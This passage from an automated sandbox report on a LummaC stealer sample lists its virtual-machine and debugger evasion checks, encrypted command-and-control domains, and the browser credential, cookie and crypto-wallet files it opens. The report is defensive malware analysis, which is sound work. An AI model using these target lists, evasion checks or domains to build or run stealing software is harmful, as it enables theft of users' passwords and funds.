Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.11.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.11.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.11.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.11.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 2oM46LNCOo.exe, 00000002.00000002.1884153162.00000000009B4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual USB Mouse
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.11.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.11.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.11.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.0000000001527000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1404582172.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438851460.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1426169334.0000000001529000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 2oM46LNCOo.exe, 00000002.00000002.1884153162.00000000009B4000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 2oM46LNCOo.exe, 00000002.00000002.1886070092.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: 2oM46LNCOo.exe, 00000002.00000003.1344744366.0000000005D94000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: NTICE
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: SICE
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Process queried: DebugPort	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: bashfulacid.lat
Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: tentabatte.lat
Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: curverpluch.lat
Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: talkynicer.lat
Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: shapestickyr.lat
Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: manyrestro.lat
Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: slipperyloo.lat
Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: wordyfindy.lat
Source: 2oM46LNCOo.exe, 00000002.00000002.1882951702.00000000007D1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: observerfry.lat

Source: 2oM46LNCOo.exe, 00000002.00000002.1884454096.00000000009F6000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: MProgram Manager

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.11.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: 2oM46LNCOo.exe, 00000002.00000003.1511624035.00000000015BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: 2oM46LNCOo.exe, 2oM46LNCOo.exe, 00000002.00000003.1439414268.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1451668733.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1452024343.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1574485157.0000000005D4F000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1511602212.0000000005D4D000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438667211.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1451859378.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438851460.0000000001529000.00000004.00000020.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000003.1438703314.0000000005D52000.00000004.00000800.00020000.00000000.sdmp, 2oM46LNCOo.exe, 00000002.00000002.1890146207.0000000005D50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.11.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 2oM46LNCOo.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: 2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: 2oM46LNCOo.exe, 00000002.00000003.1451859378.0000000001583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: elfplplebdjjenllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojp
Source: 2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 2oM46LNCOo.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 2oM46LNCOo.exe	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: 2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: 2oM46LNCOo.exe	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: 2oM46LNCOo.exe, 00000002.00000003.1404551401.0000000001583000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: 2oM46LNCOo.exe, 00000002.00000003.1426222320.0000000001542000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
